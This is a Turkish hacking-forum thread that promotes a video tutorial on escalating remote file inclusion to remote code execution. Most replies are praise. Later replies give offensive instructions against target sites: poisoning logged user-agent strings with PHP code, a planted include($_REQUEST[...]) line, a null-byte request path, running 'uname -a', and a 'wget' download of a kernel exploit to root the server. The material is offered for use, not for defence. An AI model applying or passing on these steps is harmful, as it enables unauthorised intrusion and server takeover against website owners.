

RFI To RCE - Video Tutorial
-
Selam beyler,
Güzel bir tut olduğuna inanıyorum, umarım iyi anlatmışımdır. RFI kullanarak RCE yapmayı anlattım, youtube rs vs uğraştırmadım direk izleyebilirsiniz linkten.
iyi seyirler
-
Forumda bu tür konular azalmaya başlamıştı.
:D
Anlatım gayet güzel olumuş.
-
real_agabey bunu yazdı:
-----------------------------
Forumda bu tür konular azalmaya başlamıştı.
:D
Anlatım gayet güzel olumuş.
-----------------------------sağol hocam
-
Eline sağlık hocam =), aynen devam
-
beyler bu arada şunuda belirteyim, verdiği rce methodunu useragent veren hemen hemen heryerde kullanmanız mümkündür :) Örneğin bazı sitelerde görüyoruz, ip numaranız xxxx dir useragent : mozilla ff 3.6.3 dür der. Aynı şekilde orayada xss, rce olarak bypass yapabilirsiniz.
-
güzel anlatım olmuş x=)
-
HoLyZone bunu yazdı:
-----------------------------
beyler bu arada şunuda belirteyim, verdiği rce methodunu useragent veren hemen hemen heryerde kullanmanız mümkündür :) Örneğin bazı sitelerde görüyoruz, ip numaranız xxxx dir useragent : mozilla ff 3.6.3 dür der. Aynı şekilde orayada xss, rce olarak bypass yapabilirsiniz.
-----------------------------Dediğinn method doğrudur hocam :) Yeterki girdiğin site senin herhangi bir kullanıcı bilgini loglasın atıyorum ip adresini veren siteler eğer ip adreslerini logluyorsa
bu sitelere girerek user agent bilgilerini manipulasyonu sağlıcak bi kod ile değiştirir ve siteye loglatırsan siteyi sonra pompalayabilirsin :)
Videoda güzelmiş+
Lys bitti umarım bundan sonra artık tbt için bol bol döküman yazıcak zaman olucaktır :)
-
hocam olay sumudur
taraıycı bilgilerine özel kodlar yazmak mı
silverlight teknolojisini kulanmıyorım
-
evet :) özel kodlar diyede gözünü korkutma örnek
include($_REQUEST['musty'] . '/musty.php'); gibi bi kod bulaştırırsın sonra hacklemek istediğin siteden
site.com/logların bulunduğu dizin/log.php?musty=DIR%00 Yapıp çekebilirsin %00 dan kasıt ise null byte demektir
tabi DIR yazmamın nedeni windows server olarak düşünmem :) linux ise sistemi rootlayabilirsin bile
site.com/logların bulunduğu dizin/log.php?musty=uname -a yaparsın kerneli öğrenirsin
site.com/logların bulunduğu dizin/log.php?musty=wget http://kernelexploitini çağırırsın siteye
daha sonra şansın varsa derleyip rootlayabilirsin vs vs